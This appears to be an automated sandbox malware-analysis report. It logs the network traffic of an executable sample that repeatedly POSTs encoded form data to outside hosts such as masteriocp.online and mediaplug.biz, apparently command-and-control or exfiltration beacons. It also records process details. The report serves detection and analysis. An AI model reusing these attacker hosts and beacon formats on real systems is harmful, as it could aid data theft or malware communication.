                          Data Raw: 47 48 53 68 2d 54 74 68 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 56 41 32 6d 6d 78 6d 61 55 48 49 78 68 4c 70 74 77 55 35 72 38 72 79 6f 48 6b 79 76 70 7a 4a 33 76 2f 41 74 77 37 43 61 6b 78 4a 79 76 41 52 65 68 4c 4a 7a 7a 48 61 4d 4d 50 61 55 54 66 5a 6e 78 59 4b 2f 65 65 41 32 58 6d 30 61 5a 79 46 2f 45 50 64 2b 76 38 4e 6b 6d 48 63 52 4f 41 42 32 48 4a 6d 54 68 64 42 70 74 46 53 6b 79 31 46 56 37 4a 2f 54 73 5a 72 77 54 6f 67 65 66 70 64 38 61 35 32 6e 2b 37 47 43 52 38 73 4e 7a 4d 30 56 4b 6d 6e 37 75 51 5a 6f 6c 4e 77 4c 4f 61 2b 75 72 43 7a 4f 38 6a 70 65 37 6a 78 78 30 69 34 66 6e 75 43 53 76 56 73 75 48 56 49 3d
                          Data Ascii: GHSh-Tth=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7uQZolNwLOa+urCzO8jpe7jxx0i4fnuCSvVsuHVI=
                          Sep 13, 2024 12:03:33.505559921 CEST368INHTTP/1.1 301 Moved Permanently
                          Server: openresty
                          Date: Fri, 13 Sep 2024 10:03:33 GMT
                          Content-Type: text/html
                          Content-Length: 166
                          Connection: close
                          Location: https://www.masteriocp.online/p5rq/
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.54946713.228.81.39802136C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
                          TimestampBytes transferredDirectionData
                          Sep 13, 2024 12:03:35.172633886 CEST817OUTPOST /p5rq/ HTTP/1.1
                          Host: www.masteriocp.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US
                          Connection: close
                          Content-Length: 229
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: no-cache
                          Origin: http://www.masteriocp.online
                          Referer: http://www.masteriocp.online/p5rq/
                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                          Data Raw: 47 48 53 68 2d 54 74 68 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 48 54 2b 6d 6b 53 4f 61 46 33 49 32 6b 4c 70 74 70 45 35 76 38 72 32 6f 48 6c 33 6b 6f 48 6c 33 76 61 38 74 69 75 75 61 74 68 4a 79 67 67 52 48 76 72 4a 6f 7a 47 6d 45 4d 50 57 55 54 66 4e 6e 78 59 61 2f 64 70 63 35 55 57 30 59 51 53 46 35 4c 76 64 2b 76 38 4e 6b 6d 48 49 33 4f 45 6c 32 48 36 75 54 75 5a 64 71 75 46 53 6e 6d 6c 46 56 2f 4a 2b 61 73 5a 71 64 54 74 49 6b 66 76 5a 38 61 34 47 6e 2f 71 47 42 62 38 73 50 33 4d 31 48 4f 6c 32 67 32 78 56 2b 34 76 70 63 5a 39 61 58 6a 55 65 6b 6d 42 68 32 6f 44 64 4a 6b 78 77 6f 32 65 6a 37 31 32 38 65 5a 43 65 5a 31 4b 36 79 34 35 71 59 75 64 30 73 54 77 49 76 39 35 6f 4e
                          Data Ascii: GHSh-Tth=cwFSIiCmOGbNHT+mkSOaF3I2kLptpE5v8r2oHl3koHl3va8tiuuathJyggRHvrJozGmEMPWUTfNnxYa/dpc5UW0YQSF5Lvd+v8NkmHI3OEl2H6uTuZdquFSnmlFV/J+asZqdTtIkfvZ8a4Gn/qGBb8sP3M1HOl2g2xV+4vpcZ9aXjUekmBh2oDdJkxwo2ej7128eZCeZ1K6y45qYud0sTwIv95oN
                          Sep 13, 2024 12:03:36.168555975 CEST368INHTTP/1.1 301 Moved Permanently
                          Server: openresty
                          Date: Fri, 13 Sep 2024 10:03:35 GMT
                          Content-Type: text/html
                          Content-Length: 166
                          Connection: close
                          Location: https://www.masteriocp.online/p5rq/
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.54946813.228.81.39802136C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
                          TimestampBytes transferredDirectionData
                          Sep 13, 2024 12:03:37.729015112 CEST1834OUTPOST /p5rq/ HTTP/1.1
                          Host: www.masteriocp.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US
                          Connection: close
                          Content-Length: 1245
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: no-cache
                          Origin: http://www.masteriocp.online
                          Referer: http://www.masteriocp.online/p5rq/
                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                          Data Raw: 47 48 53 68 2d 54 74 68 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 48 54 2b 6d 6b 53 4f 61 46 33 49 32 6b 4c 70 74 70 45 35 76 38 72 32 6f 48 6c 33 6b 6f 48 74 33 76 73 6f 74 77 5a 61 61 2f 78 4a 79 74 41 52 43 76 72 49 36 7a 48 4f 36 4d 50 4c 6a 54 63 31 6e 7a 36 69 2f 59 63 6f 35 44 47 30 59 50 43 46 34 45 50 64 72 76 39 68 37 6d 48 59 33 4f 45 6c 32 48 37 65 54 6e 74 42 71 69 6c 53 6b 79 31 46 6a 37 4a 2b 79 73 5a 7a 6f 54 74 45 30 66 38 52 38 61 59 57 6e 39 59 2b 42 58 38 73 33 77 4d 30 43 4f 6c 36 46 32 78 4a 79 34 75 4e 36 5a 37 71 58 31 77 7a 74 69 69 4a 68 2f 69 6c 6f 70 51 6b 61 6d 49 6a 56 79 30 38 51 44 51 4b 44 35 4f 79 75 37 38 2b 59 74 4f 42 59 4e 48 77 33 30 65 41 41 72 74 38 51 35 58 66 2b 7a 47 31 6e 77 48 5a 43 62 52 63 34 32 35 52 41 71 62 59 74 56 36 69 63 7a 6b 68 32 4c 4f 56 6a 75 62 66 37 69 31 43 38 46 4d 52 34 66 48 32 56 58 44 79 33 35 70 43 42 2b 4d 61 68 5a 75 78 4b 6c 49 43 6d 58 63 66 6c 44 30 43 37 78 47 34 37 53 62 38 42 61 78 35 45 50 67 39 55 39 43 6f 63 67 53 6f 33 73 [TRUNCATED]
                          Data Ascii: GHSh-Tth=cwFSIiCmOGbNHT+mkSOaF3I2kLptpE5v8r2oHl3koHt3vsotwZaa/xJytARCvrI6zHO6MPLjTc1nz6i/Yco5DG0YPCF4EPdrv9h7mHY3OEl2H7eTntBqilSky1Fj7J+ysZzoTtE0f8R8aYWn9Y+BX8s3wM0COl6F2xJy4uN6Z7qX1wztiiJh/ilopQkamIjVy08QDQKD5Oyu78+YtOBYNHw30eAArt8Q5Xf+zG1nwHZCbRc425RAqbYtV6iczkh2LOVjubf7i1C8FMR4fH2VXDy35pCB+MahZuxKlICmXcflD0C7xG47Sb8Bax5EPg9U9CocgSo3suyL0x9LBixVrcKhDygvCaenDMA9KMeJ5BcwQUfYZyvLt024o0t3a6gcAa9obooCynLLZnYwgkjSxk1l5Up0KBcNwCpzb5dxtdauGLjUMpOEfzgN3B7H/CWc+BmL6DHXCr70hNo6j8v1pKHiVWgC+0H5G9fHGDmZi4p3LNws+3wyvm+LfgBJwD2w0Vq3sexyQhKYTiYG6e0rf0TZEqlxPawJCav4pVUMQMT3dFDq69YAIzbzpW9tBnt1/JKC/1ulRII0flukmgOoA4R/MOcaCXHTpMLibcroZP+VJK+CbQiKzSm8RL3bMsHXokrOuKJx7mkYeKMqaPZWk82uTcj6XpiAoiSG6bLG8ifX7odk0ymwIZFQw8/LxI0zd6ZeWji6T58XsFSY/WHKiCDeuetJDKxlKcnA8+RsrI7zNjjxX9WyVtPTDtRyHWr6Jc6a1528gcN9nwalqd+fTSIeJkT9eRDutaOGvz8n/Mn20pOrGOghVYkrkLd+v5DkZGcwoeNc3kXUSBjfT26azI8Z83gTRBIe/WLGBZb3Ru5UGecQmNPsoSvRWSRejRX5V6dboAxEFMzDpf0419I0fldvGz1JzMQ7CmYCEEzC8X5/g5gbAWr6G57r5iAVO1jRGtcsHvJ/8QHQ/2I2rRUptp5t1LxWf06JSbB4j+4rQvQ [TRUNCATED]
                          Sep 13, 2024 12:03:38.651642084 CEST368INHTTP/1.1 301 Moved Permanently
                          Server: openresty
                          Date: Fri, 13 Sep 2024 10:03:38 GMT
                          Content-Type: text/html
                          Content-Length: 166
                          Connection: close
                          Location: https://www.masteriocp.online/p5rq/
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.54946913.228.81.39802136C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
                          TimestampBytes transferredDirectionData
                          Sep 13, 2024 12:03:40.266074896 CEST526OUTGET /p5rq/?GHSh-Tth=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&1Hqh=_NtDd HTTP/1.1
                          Host: www.masteriocp.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US
                          Connection: close
                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                          Sep 13, 2024 12:03:41.188174963 CEST521INHTTP/1.1 301 Moved Permanently
                          Server: openresty
                          Date: Fri, 13 Sep 2024 10:03:41 GMT
                          Content-Type: text/html
                          Content-Length: 166
                          Connection: close
                          Location: https://www.masteriocp.online/p5rq/?GHSh-Tth=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&1Hqh=_NtDd
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.56130766.81.203.10802136C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
                          TimestampBytes transferredDirectionData
                          Sep 13, 2024 12:04:05.071877003 CEST1822OUTPOST /osde/ HTTP/1.1
                          Host: www.mediaplug.biz
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US
                          Connection: close
                          Content-Length: 1245
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: no-cache
                          Origin: http://www.mediaplug.biz
                          Referer: http://www.mediaplug.biz/osde/
                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                          Data Raw: 47 48 53 68 2d 54 74 68 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 74 4c 59 58 50 37 75 63 31 52 56 41 6c 75 74 6e 78 6a 77 77 33 36 4b 79 4a 39 63 43 6e 4c 2b 57 7a 36 37 2f 65 66 38 39 7a 6e 46 30 61 46 66 4a 50 57 62 72 45 48 59 78 50 65 55 73 5a 42 5a 63 68 4a 62 4c 78 2b 42 45 47 57 47 53 47 53 6a 34 6b 41 46 71 52 49 45 79 76 43 79 69 77 6b 5a 43 6d 74 48 6d 36 33 76 42 6e 64 2f 51 30 61 4d 74 67 38 61 6e 72 6b 4f 50 66 43 6a 4c 77 58 53 4d 71 57 39 63 32 77 78 4a 73 37 46 64 55 46 39 44 63 38 2b 39 57 46 2f 4e 6b 4c 53 2b 65 6b 4d 63 63 61 48 4e 42 4c 50 6e 4b 75 48 42 4a 56 72 2b 51 56 34 71 4a 75 43 51 62 4a 39 49 33 70 57 6f 6c 74 43 72 42 4f 62 76 4c 5a 6c 50 51 58 4c 32 56 63 5a 6b 4a 4c 61 59 64 34 32 39 65 44 7a 79 74 44 77 34 67 39 34 73 66 70 48 36 64 63 77 39 36 53 5a 74 37 55 71 4c 48 49 2b 43 57 6c 67 58 33 45 4b 50 5a 72 76 67 43 76 32 39 50 54 4a 72 4c 57 58 4d 66 46 38 2b 66 65 50 51 48 6b 50 6e 6c 49 49 38 72 69 72 44 41 54 4e 66 30 4b 57 45 49 6d 39 6a 4d 4d 43 54 61 56 5a 39 66 [TRUNCATED]
                          Data Ascii: GHSh-Tth=cUZt2z1pvMaytLYXP7uc1RVAlutnxjww36KyJ9cCnL+Wz67/ef89znF0aFfJPWbrEHYxPeUsZBZchJbLx+BEGWGSGSj4kAFqRIEyvCyiwkZCmtHm63vBnd/Q0aMtg8anrkOPfCjLwXSMqW9c2wxJs7FdUF9Dc8+9WF/NkLS+ekMccaHNBLPnKuHBJVr+QV4qJuCQbJ9I3pWoltCrBObvLZlPQXL2VcZkJLaYd429eDzytDw4g94sfpH6dcw96SZt7UqLHI+CWlgX3EKPZrvgCv29PTJrLWXMfF8+fePQHkPnlII8rirDATNf0KWEIm9jMMCTaVZ9ftxSLcr/PA+SyNPMdxXcyOWIWkl0LMTywG70qE4p8S297URBHk7zAb0IuDuDHGknf2yMyxc8ycB09e9PMAmWAwFiBiFMJ8w3DaRE7uiYeR4MwQGRD86b8qGEzh7EYe7/f6WwHbJCnTHTKZ7nHx+l/EIJUrnPI08IFeXyYW4/XGuJyneqvu4bebEAb/v1r+dCg0v347sW6PLYFr5F6D75Ms693lfXxjMv//ZlNocxCy7PZcF/coXiinxjUjc1UOOJQveYQP78Pab7fKLy+/QBlJsDPxMv5RK0x8fgiy6OPKjIb8YHz0J1irJXqgtl+LfGTCc2e76iqb8xODxtyCp3jKpbLHmuzpYDR52k71fjqkQQSmiU0RnWzVkKvtpzdPIze4JxdypMOVbva/CqQoadE/L11GTPOd+TJlVoaWkR5WhzbRssqYq3akqXDqONbZ/6TD0NUM8fOi/itOqY0TJluL5kRsP5lPaJDnuSPY/XM7kvHBcn0dDcyHg8UtfwC7eLhLPdRpPXa7gfhix58tWC/FClmnwG8FYEdPkjINmoaFneCRyryQa8DqhkBJzw3uKtIYMGAxlpwnQPbn0e8xw+D3Ci/dn9/q1p/UEc3ZozvMhDmoVMyGiVSNpL933P+uObzvk2ehPOmqphPyjGy9zuNyT61+5FgheLqgD [TRUNCATED]
                          Sep 13, 2024 12:04:05.753561020 CEST727INHTTP/1.1 405 Not Allowed
                          Server: nginx/1.14.2
                          Date: Fri, 13 Sep 2024 10:04:05 GMT
                          Content-Type: text/html
                          Content-Length: 575
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 [TRUNCATED]
                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.56130866.81.203.10802136C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
                          TimestampBytes transferredDirectionData
                          Sep 13, 2024 12:04:07.608773947 CEST522OUTGET /osde/?GHSh-Tth=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sPWqJU3bviStab5pw4zunthcPnIDJoH7elLKb+pwDrPWt7Q==&1Hqh=_NtDd HTTP/1.1
                          Host: www.mediaplug.biz
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US
                          Connection: close
                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                          Sep 13, 2024 12:04:08.333240032 CEST1236INHTTP/1.1 200 OK
                          Server: nginx/1.14.2
                          Date: Fri, 13 Sep 2024 10:04:08 GMT
                          Content-Type: text/html
                          Content-Length: 1432
                          Last-Modified: Tue, 14 May 2024 12:20:23 GMT
                          Connection: close
                          ETag: "66435707-598"
                          Accept-Ranges: bytes
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 68 74 6d 6c 2c 0d 0a 20 20 20 20 20 20 62 6f 64 79 2c 0d 0a 20 20 20 20 20 20 23 70 61 72 74 6e 65 72 2c 0d 0a 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0d [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height: 100%; width: 100%; margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent; } /*body { overflow:hidden; }*/ </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div style="text-align: center;"> <p>This domain is pending renewal or has expired. Please contact the domain provider with questions.</p></div> <div id="partner"></div> <script type="text/j
                          Sep 13, 2024 12:04:08.333455086 CEST224INData Raw: 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0d 0a 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61
                          Data Ascii: avascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'Skenzor22' + '/park.j
                          Sep 13, 2024 12:04:08.333486080 CEST206INData Raw: 73 3f 62 65 66 6f 72 65 42 6f 64 79 45 6e 64 48 54 4d 4c 3d 25 33 43 70 25 33 45 54 68 69 73 2b 64 6f 6d 61 69 6e 2b 69 73 2b 70 65 6e 64 69 6e 67 2b 72 65 6e 65 77 61 6c 2b 6f 72 2b 68 61 73 2b 65 78 70 69 72 65 64 2e 2b 50 6c 65 61 73 65 2b 63
                          Data Ascii: s?beforeBodyEndHTML=%3Cp%3EThis+domain+is+pending+renewal+or+has+expired.+Please+contact+the+domain+provider+with+questions.%3C%2Fp%3E">' + '<\/script>' ) </script> </body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.561309103.42.108.46802136C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
                          TimestampBytes transferredDirectionData
                          Sep 13, 2024 12:04:13.904946089 CEST800OUTPOST /yl6y/ HTTP/1.1
                          Host: www.independent200.org
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US
                          Connection: close
                          Content-Length: 209
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: no-cache
                          Origin: http://www.independent200.org
                          Referer: http://www.independent200.org/yl6y/
                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                          Data Raw: 47 48 53 68 2d 54 74 68 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 34 2b 61 4e 46 42 6d 66 4b 2f 77 73 66 62 72 45 4d 38 41 4a 76 30 70 39 6b 2b 66 65 38 64 6e 33 5a 4e 37 68 54 64 52 43 61 73 31 33 57 4f 43 42 61 42 54 45 64 66 4d 44 65 59 41 4e 48 6e 56 39 76 6f 76 30 4a 70 42 4f 41 79 56 56 54 50 54 38 48 69 55 75 65 56 39 6f 56 32 44 50 51 50 6b 73 70 2b 30 47 44 72 66 63 61 54 56 4b 45 79 58 58 51 56 43 6b 67 77 71 6f 61 66 78 4e 6f 52 78 4c 57 54 6f 61 78 75 63 56 74 41 49 43 63 70 57 68 42 41 69 35 59 71 34 53 38 2b 41 64 78 55 6a 2f 41 53 2b 76 62 69 32 6d 50 78 53 34 6a 4b 64 34 47 48 54 55 36 32 75 6e 66 34 34 3d
                          Data Ascii: GHSh-Tth=dNiLasFHVsc44+aNFBmfK/wsfbrEM8AJv0p9k+fe8dn3ZN7hTdRCas13WOCBaBTEdfMDeYANHnV9vov0JpBOAyVVTPT8HiUueV9oV2DPQPksp+0GDrfcaTVKEyXXQVCkgwqoafxNoRxLWToaxucVtAICcpWhBAi5Yq4S8+AdxUj/AS+vbi2mPxS4jKd4GHTU62unf44=
                          Sep 13, 2024 12:04:14.765163898 CEST154INHTTP/1.1 403 Forbidden
                          Content-Type: text/plain; charset=utf-8
                          Date: Fri, 13 Sep 2024 10:04:14 GMT
                          Content-Length: 11
                          Connection: close
                          Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                          Data Ascii: Bad Request


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:06:02:06
                          Start date:13/09/2024
                          Path:C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe"
                          Imagebase:0x80000
                          File size:1'225'728 bytes
